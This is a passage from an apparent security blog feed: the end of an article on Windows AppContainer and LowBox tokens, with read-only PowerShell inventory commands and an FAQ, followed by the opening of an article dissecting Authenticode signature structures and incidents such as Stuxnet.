&lt;p&gt;Use Windows Sandbox (&lt;code&gt;WindowsSandbox.exe&lt;/code&gt;) for Hyper-V-isolated execution of untrusted programs on Pro, Enterprise, or Education editions [@ms-learn-sandbox-overview]. Configurations are described in a &lt;code&gt;.wsb&lt;/code&gt; file: a 30 MB Dynamic Base Image launches in a few seconds, and Windows 11 22H2 onward preserves data through in-sandbox restarts.&lt;/p&gt;
&lt;p&gt;Monitor the &lt;code&gt;Microsoft-Windows-AppxPackaging/Operational&lt;/code&gt; and &lt;code&gt;Microsoft-Windows-AppXDeploymentServer/Operational&lt;/code&gt; event logs for unexpected &lt;code&gt;CreateAppContainerToken&lt;/code&gt; failures and capability mismatches. Microsoft Learn&apos;s AppX troubleshooting page names these two channels verbatim and walks the diagnostic surface they expose [@ms-learn-appx-troubleshooting].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Five commands a defender can run today to inventory AppContainer adoption on a managed endpoint: 1. &lt;code&gt;Get-AppxPackage -AllUsers | Select-Object Name, PackageFullName, PackageFamilyName&lt;/code&gt; -- enumerate installed MSIX packages. 2. &lt;code&gt;(Get-AppxPackage -Name Microsoft.MicrosoftEdge.Stable).Manifest&lt;/code&gt; -- inspect a specific package&apos;s manifest. 3. &lt;code&gt;Get-Process | Where-Object &amp;amp;#123; $_.Path -like &quot;*WindowsApps*&quot; &amp;amp;#125; | Select-Object Id, ProcessName, Path&lt;/code&gt; -- find running UWP / packaged processes. 4. From an elevated PowerShell with &lt;code&gt;NtObjectManager&lt;/code&gt; installed: &lt;code&gt;Get-NtToken -ProcessId &amp;lt;pid&amp;gt;&lt;/code&gt; to see the &lt;code&gt;LowBoxToken&lt;/code&gt; flag, Package SID, and capability list. 5. &lt;code&gt;Get-AppxLog | Where-Object &amp;amp;#123; $_.LevelDisplayName -eq &quot;Error&quot; &amp;amp;#125;&lt;/code&gt; -- review AppX deployment errors for clues to broken AppContainer launches.&lt;/p&gt;
&lt;/blockquote&gt;

Once `NtObjectManager` is installed (from PowerShell Gallery), a defender can dump the *complete* reachable kernel-object set for a running LowBox process:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Install-Module NtObjectManager -Scope CurrentUser
$pid = (Get-Process -Name calc).Id
Get-AccessibleObject -ProcessId $pid -TypeFilter Mutant,Section,Event,Directory |
  Sort-Object Path | Format-Table -Property TypeName, Path, GrantedAccess
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output enumerates every named kernel object the LowBox token can open, with the access mask the kernel would grant on each request. Any path that resolves outside &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; is a candidate for cross-package leakage or an over-permissive capability. This is the same surface §9 problem 1 catalogues [@sandboxsecuritytools].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

Converting a `mediumIL` packaged Win32 app to `appContainer` is structurally easier than it sounds and operationally harder than it sounds. Structurally, the manifest change is one line: drop `` and set `uap10:TrustLevel=&quot;appContainer&quot;` [@ms-learn-msix-container]. Operationally, you must remove every HKLM write the app does, every assumption that absolute file paths outside the per-package directory will succeed, and every dependency on registering out-of-process COM. Legacy desktop apps tend to violate all three in plumbing that nobody documented. This is why `runFullTrust` is so widespread in third-party MSIX packages despite Microsoft&apos;s clear guidance to stop adding it.
&lt;p&gt;The practical guidance only matters if the deployment is correctly understood. The next section addresses the most common misconceptions.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. AppContainer and integrity level are orthogonal axes. AppContainer is a per-application principal in the access token; integrity level is a mandatory label. Microsoft Learn states the relationship plainly: &quot;if you _are_ in an app container, then the integrity level (IL) is always _low_&quot; -- but the converse is *not* true. Plenty of Low-IL tokens are not AppContainer tokens (the IE 7 Protected Mode renderer was the historical example; the LocalLow workspace and the Low-IL Chromium target are modern examples) [@ms-learn-legacy].

Because the LowBox process&apos;s Object Manager namespace is partitioned at `\Sessions\\AppContainerNamedObjects\\`, and the WinRT API the UWP app uses for `Windows.Storage.TempFolder` resolves a per-package temporary directory under `%LOCALAPPDATA%\Packages\\AC\Temp\` instead of the global `\BaseNamedObjects`-anchored `C:\Windows\Temp`. The kernel handles for the rewrite live in the `LowboxHandlesEntry` AVL-tree slot keyed by your process&apos;s `AppContainerNumber`.

*LowBox* is the kernel-internal name preserved in `NtCreateLowBoxToken` and the `_TOKEN.Flags.LowBoxToken` bit [@ms-learn-legacy] [@ms-learn-ntcreatelowboxtoken]. *AppContainer* is the public Win32 / WinRT API name for the same kernel object. *LPAC* (*Less Privileged AppContainer*) is the variant where the synthetic `WIN://NOALLAPPPKG` capability strips the implicit `ALL_APP_PACKAGES` group SID from the new token, requiring the package to declare each access (`registryRead`, `lpacCom`, and others) explicitly [@ms-learn-implementing].

Because the Package SID is a deterministic hash of the Package Family Name (which is itself a hash of the publisher distinguished name plus the package moniker). Each of the eight 32-bit sub-authorities is a 4-byte slice of the underlying SHA-256 hash (8 × 4 bytes = 32 bytes = 256 bits). The point of the construction is that every Windows 8 or later machine derives the *same* Package SID for the same Package Family Name, so per-package directory DACLs can be ACL&apos;d at install time to a known SID [@ms-learn-derivesid] [@nostarch-wsi].

No. The kernel&apos;s `AppContainerNumber` per-instance counter keys each instance into its own slot in `nt!SepLowBoxHandlesTable`, and the Object Manager rewrites `\BaseNamedObjects` references against the per-instance saved-handle directory before name lookup [@nostarch-wsi]. Two Calculator processes share a Package SID and a Capabilities array but have *different* AppContainerNumbers; the named objects each one creates land in different directories.

Yes -- unless the AppContainer has `WIN://NOALLAPPPKG`, in which case it is LPAC and `ALL_APP_PACKAGES` is omitted from its token [@ms-learn-implementing] [@chromium-lpac]. The `ALL_APP_PACKAGES` ambient-access surface is the §9 problem-1 research class. The standard tool for enumerating what an `ALL_APP_PACKAGES` member can reach on a given system is the `Get-AccessibleObject` cmdlet in Forshaw&apos;s `NtObjectManager` PowerShell module, and Microsoft publishes its own `LaunchAppContainer` testing tool in `SandboxSecurityTools` [@sandboxsecuritytools].

No. Windows Sandbox combines a *separate* Hyper-V partition running a pristine Windows kernel from the Dynamic Base Image [@ms-learn-sandbox-arch] with -- according to security-research reverse-engineering write-ups -- an AppContainer wrap on the host-side container manager. The Hyper-V layer is the only documented structural defence against kernel exploits inside the sandbox; pure AppContainer cannot defend against a kernel exploit. Inside the sandbox you still see the LowBox plumbing (it is a Windows guest, after all), but the meaningful trust boundary is the hypervisor partition.
&lt;h2&gt;12. Where This Plane Connects to the Others&lt;/h2&gt;
&lt;p&gt;AppContainer is the &lt;em&gt;principal layer&lt;/em&gt; of the modern Windows sandbox stack. It is not the whole stack. A correct modern Windows app launch crosses four single-purpose layers in the kernel and in the deployment pipeline, and each layer carries a separate guarantee.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Code identity.&lt;/strong&gt; Who is this code? &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; signatures, kernel-mode code signing, the MSIX signing pipeline, and the Package Family Name derivation answer that question [@ms-learn-derivesid].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AppContainer / LowBox token.&lt;/strong&gt; What principal is the running instance? &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; sets the LowBox flag, stamps the Package SID, and populates &lt;code&gt;Capabilities[]&lt;/code&gt; [@ms-learn-ntcreatelowboxtoken].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Object Manager namespace partition.&lt;/strong&gt; What names can the principal resolve? &lt;code&gt;LowboxHandlesEntry&lt;/code&gt; directs the path-walker to the per-package &lt;code&gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; directory [@nostarch-wsi].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Process mitigation policies&lt;/a&gt;.&lt;/strong&gt; What is the principal allowed to do inside its own address space? Arbitrary Code Guard, Code Integrity Guard, Control Flow Guard, Extended Flow Guard, Hardware-enforced Stack Protection (CET), and ImageLoadPolicy are the in-process mitigations Windows applies on top of the per-app principal, exposed via the &lt;code&gt;PROCESS_MITIGATION_POLICY&lt;/code&gt; enumeration that &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; accepts [@ms-learn-process-mitigation-policy].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Walk a modern Windows app boot. Authenticode and the MSIX signing pipeline verify the binaries. The MSIX deployment stack derives the Package SID from the Package Family Name and writes the per-package profile under &lt;code&gt;%LOCALAPPDATA%\Packages\&amp;lt;PFN&amp;gt;\&lt;/code&gt;. The launcher calls &lt;code&gt;CreateProcess&lt;/code&gt; with a &lt;code&gt;SECURITY_CAPABILITIES&lt;/code&gt; payload, which calls &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; in the kernel. &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; sets the LowBox flag and the per-instance fields. From that point every later &lt;code&gt;SeAccessCheck&lt;/code&gt; against any object the process opens consults the new token&apos;s per-app fields alongside the classic user / groups walk. The Object Manager namespace gets partitioned in the kernel&apos;s hash table by the &lt;code&gt;AppContainerNumber&lt;/code&gt;. The in-process mitigation policies decide what code may execute and which DLLs may load.&lt;/p&gt;

flowchart LR
    A[Authenticode / KMCS&lt;br /&gt;code identity] --&amp;gt; B[NtCreateLowBoxToken&lt;br /&gt;per-app principal]
    B --&amp;gt; C[Object Manager&lt;br /&gt;namespace partition]
    C --&amp;gt; D[Mitigation policies&lt;br /&gt;ACG / CIG / CFG / XFG / CET]
    D --&amp;gt; E[Running LowBox process]
&lt;p&gt;Each layer is single-purpose. Together they cover the four-axis system the classic NT token model could not.&lt;/p&gt;

The LowBox bit is the answer to the question Windows NT 3.1 couldn&apos;t ask. Everything else is bookkeeping.
&lt;p&gt;Two calculators on the same Windows 11 machine give the kernel a single question with two verdicts. The bit in &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt; is the one-line answer Windows took fourteen years to ship -- and the work Microsoft did in the years between January 30, 2007 and October 26, 2012 is what made it possible to ask the question at all.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;appcontainer-and-lowbox-tokens-windowss-capability-sandbox&quot; keyTerms={[
  { term: &quot;LowBox token&quot;, definition: &quot;An access token whose _TOKEN.Flags.LowBoxToken bit is set, marking the process as an AppContainer process whose access checks consult the package SID, capability SIDs, and per-instance namespace fields.&quot; },
  { term: &quot;Package SID&quot;, definition: &quot;A deterministic SHA-2-derived SID with prefix S-1-15-2-* that names a specific MSIX/UWP package.&quot; },
  { term: &quot;Capability SID&quot;, definition: &quot;A SID with prefix S-1-15-3-* representing a per-package permission declared in the application manifest.&quot; },
  { term: &quot;AppContainerNumber&quot;, definition: &quot;A per-instance integer assigned by NtCreateLowBoxToken that keys per-instance state in the kernel&apos;s session-scoped AVL trees.&quot; },
  { term: &quot;LPAC&quot;, definition: &quot;Less Privileged AppContainer -- a LowBox token whose WIN://NOALLAPPPKG capability strips the ALL_APP_PACKAGES group SID for stricter deny-by-default.&quot; },
  { term: &quot;Mandatory Integrity Control&quot;, definition: &quot;Vista-era mechanism adding an integrity level (Low/Medium/High/System) to every process and securable object; AppContainer tokens are always Low IL.&quot; },
  { term: &quot;Dynamic Base Image&quot;, definition: &quot;Windows Sandbox&apos;s read-only file set, stored as a 30 MB compressed package and unpacked to 500 MB, that a fresh Hyper-V partition boots from.&quot; }
]} questions={[
  { q: &quot;Which kernel data-structure field distinguishes a UWP calc.exe from a legacy win32calc.exe even when every classic NT token field is identical?&quot;, a: &quot;_TOKEN.Flags.LowBoxToken, the bit set by NtCreateLowBoxToken and consulted by every AppContainer-aware access-check path.&quot; },
  { q: &quot;Why are two co-tenanted instances of the same package different principals to the kernel?&quot;, a: &quot;Because NtCreateLowBoxToken assigns a fresh AppContainerNumber per instance and the Object Manager keys the per-instance namespace handles on that number.&quot; },
  { q: &quot;Name the synthetic capability that turns an AppContainer into an LPAC.&quot;, a: &quot;WIN://NOALLAPPPKG -- its presence in Capabilities[] causes NtCreateLowBoxToken to omit the ALL_APP_PACKAGES group SID from the new token.&quot; },
  { q: &quot;What is the only structural defence against kernel exploits inside an AppContainer?&quot;, a: &quot;Hypervisor isolation. Windows Sandbox wraps an AppContainer-managed guest in a separate Hyper-V partition with its own kernel.&quot; },
  { q: &quot;Cite the Microsoft Learn intersection rule for AppContainer access checks.&quot;, a: &quot;&apos;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&apos; -- the dual-principal rule that runs on every LowBox access decision.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>appcontainer</category><category>lowbox-token</category><category>sandbox</category><category>capability-security</category><category>msix</category><category>uwp</category><category>windows-sandbox</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Authenticode and Catalog Files: The Crypto Foundation Under WDAC</title><link>https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/</link><guid isPermaLink="true">https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/</guid><description>Every Windows trust decision -- UAC, SmartScreen, WDAC, kernel-driver loading -- bottoms out on the same PKCS#7 SignedData envelope shipped in IE 3 in August 1996. Here is the byte-level reason.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
Every Windows trust decision -- UAC, SmartScreen, App Control for Business (WDAC), and kernel-mode driver loading -- bottoms out on the same PKCS#7 / CMS `SignedData` envelope that Microsoft shipped with Internet Explorer 3 in August 1996. This article dissects that envelope byte by byte: the `WIN_CERTIFICATE` record inside the PE certificate table, the `SpcIndirectDataContent` attribute that signs a hash rather than a file (which is what makes catalog signing and per-page hashing possible), the RFC 3161 timestamp tokens that keep 2010 signatures verifying in 2026, and the `Microsoft Code Verification Root` kernel chain. We follow the named incidents that drove every post-2010 retrenchment -- Stuxnet, Flame, CVE-2013-3900, ShadowHammer, the 2022 Vulnerable Driver Blocklist, the 2026 Bitwarden CLI npm hijack -- and finish at the WDAC rule levels (`Publisher`, `FilePublisher`, `WHQL`) that finally surface those primitives to administrators as policy.
&lt;h2&gt;1. The verified-publisher question&lt;/h2&gt;
&lt;p&gt;On 17 June 2010, Sergey Ulasen and his colleagues at VirusBlokAda in Minsk began circulating a sample of a worm that would, a month later, be named Stuxnet [@wiki-stuxnet][@stuxnet-dossier]. Two of its kernel-mode components, &lt;code&gt;mrxcls.sys&lt;/code&gt; and &lt;code&gt;mrxnet.sys&lt;/code&gt;, were signed -- properly, by Authenticode-conformant certificates issued to Realtek Semiconductor Corp. and shortly afterwards by JMicron Technology Corp. [@stuxnet-dossier][@archive-stuxnet-dossier-details]. The Windows kernel loaded them because the certificate chains validated. The chains validated because, cryptographically, nothing was wrong.&lt;/p&gt;
&lt;p&gt;That sentence is the lens for everything in this article. Microsoft&apos;s code-identity system did its job exactly as designed, and a piece of state-grade sabotage walked through it. The next forty minutes of reading reconstruct what the kernel checks before loading a driver, why those checks could not have caught Stuxnet, and what Microsoft layered on top during the next fourteen years so that the next stolen Realtek private key has less reach.&lt;/p&gt;
&lt;h3&gt;Where Authenticode shows up&lt;/h3&gt;
&lt;p&gt;Most Windows users meet Authenticode without realising it. The &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;User Account Control dialog&lt;/a&gt; that says &quot;Verified publisher: Microsoft Windows&quot; instead of &quot;Publisher: Unknown&quot; is the user-visible end of a long cryptographic chain that bottoms out in a PKCS#7 / CMS &lt;code&gt;SignedData&lt;/code&gt; envelope wrapped inside a &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; record at the end of the PE file [@mslearn-authenticode-driver][@mslearn-pe-format]. The same plumbing is queried by SmartScreen, by App Control for Business (the 2024 rename of Windows Defender Application Control) [@mslearn-appcontrol-root], by &lt;code&gt;ci.dll&lt;/code&gt; at kernel-driver load [@mslearn-kmcs-policy], and by Windows Update during servicing. They all read the &lt;em&gt;same&lt;/em&gt; bytes in the certificate table; the verdicts differ only in which fields they consult and which policy they overlay.&lt;/p&gt;

flowchart TD
    SD[&quot;PKCS#7 / CMS SignedData&lt;br /&gt;(inside WIN_CERTIFICATE)&quot;]
    UAC[&quot;UAC&lt;br /&gt;&apos;Verified publisher&apos;&quot;]
    SS[&quot;SmartScreen&lt;br /&gt;reputation lookup&quot;]
    WDAC[&quot;App Control for Business (WDAC)&lt;br /&gt;rule evaluation&quot;]
    KMCS[&quot;ci.dll / KMCS&lt;br /&gt;kernel-driver load&quot;]
    SD --&amp;gt; UAC
    SD --&amp;gt; SS
    SD --&amp;gt; WDAC
    SD --&amp;gt; KMCS
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every Windows trust statement -- UAC, SmartScreen, App Control for Business, kernel-mode driver loading -- is a query against the same small set of structures inside the PE certificate table. Once you can read those structures, you can predict every later trust decision the OS makes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;What you will be able to do by the end of this article&lt;/h3&gt;
&lt;p&gt;By the end of section 7 you should be able to decode every line of &lt;code&gt;signtool verify /v /pa /all&lt;/code&gt; output and explain, in one paragraph, why Stuxnet still loaded under a fully patched Windows 7 kernel. By the end of section 11 you should be able to run &lt;code&gt;certutil -CatDB&lt;/code&gt;, &lt;code&gt;New-CIPolicyRule -FilePath ... -Level FilePublisher&lt;/code&gt;, and &lt;code&gt;certutil -hashfile&lt;/code&gt; and explain what every byte of their output corresponds to in the on-disk structure.&lt;/p&gt;
&lt;p&gt;Stuxnet&apos;s kernel components loaded because the chain validated. The chain validated because, cryptographically, nothing was wrong. To understand why that sentence is true -- and what Microsoft has done in the fourteen years since to keep the next stolen Realtek certificate from getting as far -- we have to start in August 1996.&lt;/p&gt;
&lt;h2&gt;2. 1996: PKCS#7, ActiveX, and the original sin of downloadable code&lt;/h2&gt;
&lt;p&gt;Counterintuitively, Authenticode was not invented to sign Windows binaries. It was invented to sign downloadable web payloads.&lt;/p&gt;
&lt;p&gt;On 7 August 1996, Microsoft and VeriSign jointly announced what their press release called &quot;the first technology for secure downloading of software over the Internet&quot; [@press-pass-1996]. The release introduces Authenticode as a feature of Internet Explorer 3 beta 2, names Hank Vigil (&quot;general manager of the electronic commerce group at Microsoft&quot;) and Stratton Sclavos (&quot;president and CEO&quot; of VeriSign), and explicitly anchors the design in &lt;em&gt;open&lt;/em&gt; standards: &quot;Authenticode and VeriSign&apos;s Digital ID service support Internet standards, including the X.509 certificate format and PKCS #7 signature blocks&quot; [@press-pass-1996]. Six days later, on 13 August 1996, Internet Explorer 3 itself shipped as RTM for Microsoft Windows [@wiki-ie3].&lt;/p&gt;
&lt;p&gt;The original motivating problem was ActiveX. An ActiveX control was a downloadable COM binary that the browser would load in-process; without a signature, the browser had no idea who built it. The April 1996 W3C submission that preceded Authenticode is described in the press release as a &quot;code-signing proposal supported by more than 40 companies&quot; [@press-pass-1996]The 40+ company W3C signatory list is the institutional fact that made third-party CA participation possible from day one and seeded the modern multi-vendor code-signing economy. None of the architectural decisions that followed -- catalog signing, RFC 3161 timestamping, EV certificates -- would have been viable inside a single-vendor PKI.. Anchoring the design in X.509 and PKCS#7 instead of inventing a Microsoft-only signature format is the choice that made everything afterwards possible.&lt;/p&gt;
&lt;h3&gt;PKCS#7 was already there&lt;/h3&gt;
&lt;p&gt;By 1996, the &lt;em&gt;envelope&lt;/em&gt; part of the design was solved. RSA Laboratories had published PKCS #7 v1.5 in November 1993 as part of the Public-Key Cryptography Standards series [@rfc-2315]; in March 1998 the IETF republished it verbatim as RFC 2315, &quot;Cryptographic Message Syntax Version 1.5,&quot; authored by Burt Kaliski [@rfc-2315]. The same envelope evolved further: the IETF rebranded it as Cryptographic Message Syntax (CMS) and shipped progressively richer versions through RFCs 2630 (1999), 3369 (2002), 3852 (2004), and 5652 (2009) [@rfc-5652]. Modern Authenticode parsers consume the CMS dialect, but the on-disk envelope structure has barely moved in thirty years.&lt;/p&gt;

The ASN.1 envelope -- originally PKCS#7 v1.5 (Kaliski, 1993; republished as RFC 2315 in 1998), now generalised as CMS in RFC 5652 -- that carries the signature, signed and unsigned attributes, and the chain of X.509 certificates inside the Authenticode certificate-table entry [@rfc-5652].
&lt;p&gt;Authenticode is, in one sentence, &lt;em&gt;&quot;PKCS#7 SignedData carrying a Microsoft-defined content type that hashes the PE file in a specific repeatable way&quot;&lt;/em&gt; [@authenticode-pe-docx]. The asymmetric signature inside that envelope is RSA, the public-key system Rivest, Shamir, and Adleman published in 1978 [@rsa-1978], built on the Diffie-Hellman digital-signature concept introduced in 1976 [@diffie-hellman-1976]. None of that primitive cryptography has changed since. Everything that has changed sits &lt;em&gt;around&lt;/em&gt; the envelope: the algorithms it carries, the catalog store that lets Microsoft sign tens of thousands of files at once, the timestamp tokens that pin a signing moment in time.&lt;/p&gt;

flowchart LR
    DH[&quot;Diffie-Hellman (1976)&lt;br /&gt;digital-signature concept&quot;] --&amp;gt; RSA[&quot;RSA (1978)&quot;]
    RSA --&amp;gt; P7[&quot;PKCS#7 v1.5&lt;br /&gt;(RSA Labs, 1993)&quot;]
    P7 --&amp;gt; R2315[&quot;RFC 2315 (1998)&quot;]
    R2315 --&amp;gt; R2630[&quot;RFC 2630 (1999)&quot;]
    R2630 --&amp;gt; R3369[&quot;RFC 3369 (2002)&quot;]
    R3369 --&amp;gt; R3852[&quot;RFC 3852 (2004)&quot;]
    R3852 --&amp;gt; R5652[&quot;RFC 5652 / CMS&lt;br /&gt;(2009)&quot;]
    P7 --&amp;gt; AC[&quot;Authenticode&lt;br /&gt;(IE3, August 1996)&quot;]
    AC --&amp;gt; WC[&quot;WIN_CERTIFICATE&lt;br /&gt;in modern PE&quot;]
&lt;h3&gt;From one click to four trust decisions&lt;/h3&gt;
&lt;p&gt;The original UX of Authenticode in IE 3 was a &lt;em&gt;modal trust prompt&lt;/em&gt;. The user saw a dialog (&quot;Do you want to install and run [name] signed and distributed by [publisher]?&quot;) and clicked Yes or No. The signature was checked once, and that was the entire trust decision. By 2026, the same &lt;code&gt;SignedData&lt;/code&gt; envelope feeds at least four entirely different trust subsystems -- UAC, SmartScreen, App Control for Business, kernel-mode code integrity -- and most of the time the user clicks nothing at all.&lt;/p&gt;
&lt;p&gt;That layering is what the rest of this article is about. Thirty years on, the on-disk bytes have barely changed. The certificate table at the end of every signed Windows binary still carries a PKCS#7 SignedData envelope, and at the head of that envelope is the same content type -- &lt;code&gt;SpcIndirectDataContent&lt;/code&gt; -- Microsoft defined in 1996. What &lt;em&gt;has&lt;/em&gt; changed is everything around it: the algorithms inside the envelope, the catalog store, the timestamp tokens, the WDAC policy layer on top. Let&apos;s open the envelope and look.&lt;/p&gt;
&lt;h2&gt;3. Anatomy on disk: WIN_CERTIFICATE, PKCS#7 SignedData, SpcIndirectDataContent&lt;/h2&gt;
&lt;p&gt;Where does the signature actually live in a signed &lt;code&gt;.exe&lt;/code&gt;? Most engineers can guess &quot;the end of the file.&quot; Fewer can name the data directory entry, fewer still the wrapper structure, and almost nobody volunteers the exact ASN.1 content type. Four nesting levels matter. Walk them in order and the whole rest of the architecture starts making sense.&lt;/p&gt;
&lt;h3&gt;Level 1: the PE certificate table&lt;/h3&gt;
&lt;p&gt;The PE optional header carries a &lt;code&gt;DataDirectory[16]&lt;/code&gt; array. Entry index 4, &lt;code&gt;IMAGE_DIRECTORY_ENTRY_SECURITY&lt;/code&gt;, points at the &lt;em&gt;certificate table&lt;/em&gt; -- an offset and size into the file [@mslearn-pe-format]. Unlike every other data directory entry, the certificate table is the only one whose offset is a &lt;em&gt;file&lt;/em&gt; offset, not a relative virtual address; the certificate table is never mapped into memory at load time.&lt;/p&gt;
&lt;p&gt;Inside that offset+size region is a sequence of &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; records, each laid out as:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct _WIN_CERTIFICATE {
    DWORD       dwLength;           // total length of this record, including header
    WORD        wRevision;           // WIN_CERT_REVISION_2_0
    WORD        wCertificateType;    // WIN_CERT_TYPE_PKCS_SIGNED_DATA
    BYTE        bCertificate[ANYSIZE_ARRAY];  // the DER-encoded blob
} WIN_CERTIFICATE;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For Authenticode-signed Windows binaries, &lt;code&gt;wCertificateType == WIN_CERT_TYPE_PKCS_SIGNED_DATA&lt;/code&gt; (constant value &lt;code&gt;0x0002&lt;/code&gt;), and &lt;code&gt;bCertificate[]&lt;/code&gt; is a DER-encoded CMS / PKCS#7 SignedData blob [@authenticode-pe-docx]. Multiple &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; records are legal; this is how a single binary can carry both a SHA-1 (legacy) and a SHA-256 (modern) signature, or a dual-signed binary carrying both a primary and a nested secondary embedded signature (via the unsignedAttrs nested-signature mechanism).&lt;/p&gt;

The PE certificate-table record (`dwLength`, `wRevision`, `wCertificateType`, `bCertificate[]`) that wraps a single attribute certificate inside a PE. For Authenticode signatures, `wCertificateType` is `WIN_CERT_TYPE_PKCS_SIGNED_DATA` and `bCertificate` holds a DER-encoded CMS / PKCS#7 SignedData blob [@authenticode-pe-docx][@mslearn-pe-format].
&lt;h3&gt;Level 2: the CMS SignedData envelope&lt;/h3&gt;
&lt;p&gt;Decoding &lt;code&gt;bCertificate&lt;/code&gt; produces an ASN.1 SEQUENCE describing a CMS &lt;code&gt;ContentInfo&lt;/code&gt; whose content type is &lt;code&gt;signedData&lt;/code&gt; (OID &lt;code&gt;1.2.840.113549.1.7.2&lt;/code&gt;). Inside that is the &lt;code&gt;SignedData&lt;/code&gt; structure proper [@rfc-5652]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;version&lt;/code&gt; -- an integer, typically 1 or 3.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;digestAlgorithms&lt;/code&gt; -- the set of hash algorithms used by any signer (commonly &lt;code&gt;sha256&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;encapContentInfo&lt;/code&gt; -- the content the signers are signing over. &lt;em&gt;This is the field that matters.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;certificates&lt;/code&gt; -- the X.509 chain certificates needed to validate the signers.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;crls&lt;/code&gt; -- optional, almost never populated inline.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;signerInfos&lt;/code&gt; -- one or more &lt;code&gt;SignerInfo&lt;/code&gt; structures, each with the actual signature bytes plus signed and unsigned attributes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each &lt;code&gt;SignerInfo&lt;/code&gt; carries the signing certificate identifier, a set of &lt;code&gt;signedAttrs&lt;/code&gt; (whose digest is what gets signed), an &lt;code&gt;encryptedDigest&lt;/code&gt; (the actual signature bytes), and a set of &lt;code&gt;unsignedAttrs&lt;/code&gt;. The single most important unsigned attribute, in practice, is the RFC 3161 &lt;code&gt;TimeStampToken&lt;/code&gt; -- the counter-signature that pegs the signing event to a moment in time. We will come back to that in section 5.&lt;/p&gt;
&lt;h3&gt;Level 3: SpcIndirectDataContent&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;encapContentInfo.eContentType&lt;/code&gt; for Authenticode is &lt;code&gt;1.3.6.1.4.1.311.2.1.4&lt;/code&gt; -- the OID Microsoft registered for &lt;code&gt;SpcIndirectDataContent&lt;/code&gt;. Inside, the &lt;code&gt;eContent&lt;/code&gt; is a Microsoft-specific ASN.1 structure [@authenticode-pe-docx]:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-asn1&quot;&gt;SpcIndirectDataContent ::= SEQUENCE {
    data        SpcAttributeTypeAndOptionalValue,
    messageDigest DigestInfo
}

SpcAttributeTypeAndOptionalValue ::= SEQUENCE {
    type   OBJECT IDENTIFIER,   -- 1.3.6.1.4.1.311.2.1.15 for PE images
    value  [0] EXPLICIT ANY DEFINED BY type OPTIONAL
}

DigestInfo ::= SEQUENCE {
    digestAlgorithm AlgorithmIdentifier,
    digest          OCTET STRING
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For a PE binary, &lt;code&gt;data.type&lt;/code&gt; is &lt;code&gt;1.3.6.1.4.1.311.2.1.15&lt;/code&gt; (&lt;code&gt;SPC_PE_IMAGE_DATAOBJ&lt;/code&gt;) and &lt;code&gt;data.value&lt;/code&gt; carries a &lt;code&gt;SpcPeImageData&lt;/code&gt; structure (signing flags plus an optional &lt;code&gt;SpcLink&lt;/code&gt;); the PE&apos;s architecture and type come from the PE headers, not this ASN.1 value. The &lt;code&gt;messageDigest.digest&lt;/code&gt; is the &lt;strong&gt;Authenticode hash&lt;/strong&gt; of the PE file [@authenticode-pe-docx]. That hash is &lt;em&gt;not&lt;/em&gt; SHA-256 over the file bytes.&lt;/p&gt;

Microsoft&apos;s `eContentType` registered under OID `1.3.6.1.4.1.311.2.1.4`. Its `messageDigest` field holds the Authenticode hash of the signed artefact, and its `data` field describes what kind of artefact it is (PE image, MSI, script). The fact that this structure signs *a hash* rather than a file is what makes catalog signing possible [@authenticode-pe-docx].
&lt;h3&gt;Level 4: the Authenticode hash and its four exclusions&lt;/h3&gt;
&lt;p&gt;The Authenticode hash is computed over the PE file with four specific byte ranges excluded [@authenticode-pe-docx]:&lt;/p&gt;
&lt;table&gt;
